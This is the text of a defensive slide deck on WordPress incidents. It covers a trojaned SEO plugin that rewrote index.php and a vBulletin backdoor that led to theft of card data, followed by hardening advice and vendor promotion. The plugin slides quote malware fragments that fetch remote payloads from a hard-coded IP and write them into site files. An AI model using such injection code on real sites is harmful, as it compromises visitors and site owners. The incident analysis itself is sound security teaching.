Learning From Website Hacks WordPress Security
Learning From Website Hacks
WordPress Security
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
This is me!
o Sucuri Inc.o Website Securityo Incident Handlingo Log Analysis
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
Let’s Learn from Website Attacks
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Scenerios
o The Art of Phishing
o Stealing Credit Cards
Scenerio Uno (One)
The art of Phishing Naive Users
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Difference
o Pro Version?o Legit Version?
Modified file: aioseop_class.php
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Intent
oRedirection - porn or exploit kits
oTarget: index.php
oTaking content from here:$code_txt = 'http://91.239.15.61/o1.txt’;
oPlacing it in the files here:$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How?
o Index.php payload:
oUsing curl to pull content from here:$url = http://91.239.15.61/java/google.php;
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload
oPulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
Scenerio Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your
stack?
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce o Quick setup of payment collection systems for
goods
o Awesome, right?
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophico Blacklistingo Ban
o No more cash flow! No more Trust!
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same
environment
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload
Found here: /wp-admin/includes/list.php
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How?
o It’s about the journey folks…
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio
o list.php?
o shop.txt?
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
That’s Interesting
/forum/ajax.php?edit=
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Dump of Users
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Vector
o Access Control
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
What can you do?
Lets get proactive!
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
None of the security plugins out there would have prevented either of these attacks. So much
for all those hardening tips..
Harsh Reality
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Two Important Vectors
o Access controlo Within your control…
o Software vulnerabilitieso Not so much…
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
• There is no single cure
• Layered Defenses
• Combination of tools and actions– Combine: Protection and Detection
Defense in Depth
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Secure Solutions – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remedation - Complete Website Security
o http://sucuri.net/signup
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Software Vulnerabilities
o Trusted Sourceso Start with the repo and established communitieso If you’re not a developer this is going to be beyond your
reach mostly
o Web Application Firewall (WAF) Pluginso Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!o Sucuri CloudProxy WAF
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
• Know what is going on with your site– Integrity Checks– Logging in / Logging out– Changes being made
• More important than half the hardening tips you read on line today
• Options:– WP Security Audit log http
://wordpress.org/plugins/wp-security-audit-log/
– Sucuri Premium Pluginhttp://wordpress.sucuri.net
Auditing
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
If all else fails…
o Be sure you have backups… o VaultPress – WordPress Siteso Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Tony Perez @perezbox | @sucuri_security
[email protected]#wordsesh